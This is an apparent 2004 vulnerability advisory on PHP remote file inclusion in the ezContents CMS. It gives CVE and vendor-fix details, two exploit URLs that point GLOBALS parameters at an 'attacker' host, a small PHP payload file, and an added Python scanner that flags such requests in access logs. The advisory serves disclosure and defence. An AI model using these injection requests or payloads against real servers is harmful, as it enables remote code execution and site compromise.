Date: Wed, 11 Feb 2004 00:20:49 +0100
From: Cedric Cochin <cco@...vigilance.com>
To: submissions@...ketstormsecurity.org, vuln@...unia.com,
	news@...uriteam.com, bugtraq@...urityfocus.com,
	bugs@...uritytracker.com
Subject: PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior



	PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior

################################################################################
Summary :

ezContents, a free open source content management system, has been found to be
vulnerable to multiple PHP code injection vulnerabilities.  They enable a
malicious user to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* ezContents 2.0.2 and prior

CVE :
CAN-2004-0132

Release Date :
February 11, 2004

Severity :
HIGH

################################################################################
Examples :

		  -------------------------------------------
			 
http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/

This request imports the following file into the PHP code:
--> http://attacker/include/adodb/adodb.inc.php

The attacker just has to create the file adodb.inc.php as:
<? print "<?phpinfo();exit?>"?>

The same applies to:

http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents

This request imports the following file into the PHP code:
--> http://attacker/ezContents/lang_admin.php

This vulnerability applies only when ezContents runs on PHP version 4.3.0 or
above (prior versions did not support the inclusion of remote files), "URL
fopen wrappers" are enabled (the default), and 'register_globals' is set to
"On".

This vulnerability is present in a decent number of PHP files. The behavior of
versions 2.0RC3 and 2.0.1 is approximately the same. Some of the attacks do
not work on both versions because of different include() calls (for example,
the second one does not work on 2.0RC3 because of an additional "languages/"
at the beginning of the include call).
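
As an added example, not part of the original advisory or of ezContents: a
log check a defender could run to find requests matching the two patterns
above, i.e. a GLOBALS[...] query parameter whose value is a remote URL,
whether sent literally or percent-encoded. The access-log format, the sample
lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; addresses, paths and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Feb/2004:10:00:01 +0100] "GET /ez/include/db.php?GLOBALS[rootdp]=http://198.51.100.7/ HTTP/1.0" 200 512
192.0.2.11 - - [11/Feb/2004:10:00:05 +0100] "GET /ez/modules/news/archivednews.php?GLOBALS%5Blanguage_home%5D=http%3A%2F%2F198.51.100.7%2F&GLOBALS%5BgsLanguage%5D=ezContents HTTP/1.0" 200 733
192.0.2.12 - - [11/Feb/2004:10:01:00 +0100] "GET /ez/index.php?ref=http://example.org/page HTTP/1.0" 200 4096
192.0.2.13 - - [11/Feb/2004:10:02:00 +0100] "GET /ez/modules/news/shownews.php?id=12 HTTP/1.0" 200 2048
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Schemes that PHP's URL fopen wrappers can fetch from a remote host.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def suspicious_params(target):
    """Return (name, value) pairs that set GLOBALS[...] to a remote URL."""
    hits = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes names and values once, as PHP does.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.startswith("GLOBALS[") and REMOTE_SCHEME_RE.match(value):
            hits.append((name, value))
    return hits


def scan(log_text):
    """Return (client, path, parameter, value) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        for name, value in suspicious_params(target):
            findings.append((client, urlsplit(target).path, name, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("suspicious request:", *finding)
```

Only query strings are inspected, because request bodies are not recorded in
access logs of this kind.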

################################################################################
Vendor Status :

The information has been provided to ezContents Support Team.
A new release with fixes for these vulnerabilities is already available.
--> http://www.ezcontents.org/forum/viewtopic.php?t=361

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >


